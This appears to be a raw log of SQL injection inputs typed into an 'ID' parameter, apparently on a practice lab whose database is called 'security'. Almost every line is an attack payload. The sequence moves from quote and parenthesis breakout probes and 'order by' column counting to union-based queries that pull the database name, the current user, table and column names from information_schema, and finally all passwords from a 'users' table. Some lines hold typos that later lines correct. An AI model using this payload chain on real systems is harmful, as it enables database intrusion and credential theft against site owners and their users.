ID:1
ID:1'
ID:1)
ID:1)
ID:1
ID:1'
ID:1)
ID:1) and 1=1
ID:1) and 1=2
ID:1 and 1=1
ID:1 and 1=2
ID:(1)
ID:(1) and 1=1
ID:1) and 1=1
ID:1) and 1=2-- 
ID:1
ID:1'
ID:'1'
ID:1'-- 
ID:1-- 
ID:1
ID:1'
ID:1')
ID:1')-- 
ID:1)
ID:1)
ID:1)
ID:1)
ID:1)
ID:1)
ID:1)-- 
ID:1') order by 1
ID:1') order by 1-- 
ID:1') order by 2-- 
ID:1') order by 3-- 
ID:1') order by 4-- 
ID:1') select 1,2,3-- 
ID:1') select 1,2,3 -- 
ID:1') union select 1,2,3-- 
ID:-1') union select 1,2,3-- 
ID:-1') union select 1,database(),3-- 
ID:-1') union select 1,database(),user()-- 
ID:-1') union select 1,group_concat(table) from information_cloumn(tables) where table_clomun='security',user()-- 
ID:-1') union select 1,2,group_concat(table) from information_cloumn(tables) where table_clomun='security'-- 
ID:-1') union select 1,2,group_concat(table_name) from information_cloumn(tables) where table_clomun='security'-- 
ID:-1') union select 1,2,group_concat(table_name) from information_schema(tables) where table_clomun='security'-- 
ID:-1') union select 1,2,group_concat(table_name) from information_schema(tables) where table_schema='security'-- 
ID:-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- 
ID:-1') union select 1,2,group_concat(colmun_name) from information_schema.colmuns where table_name='user'-- 
ID:-1') union select 1,2,group_concat(colmun_name) from information_schema.colmuns where table_name='users'-- 
ID:-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'-- 
ID:-1') union select 1,2,group_concat(password) from users-- 
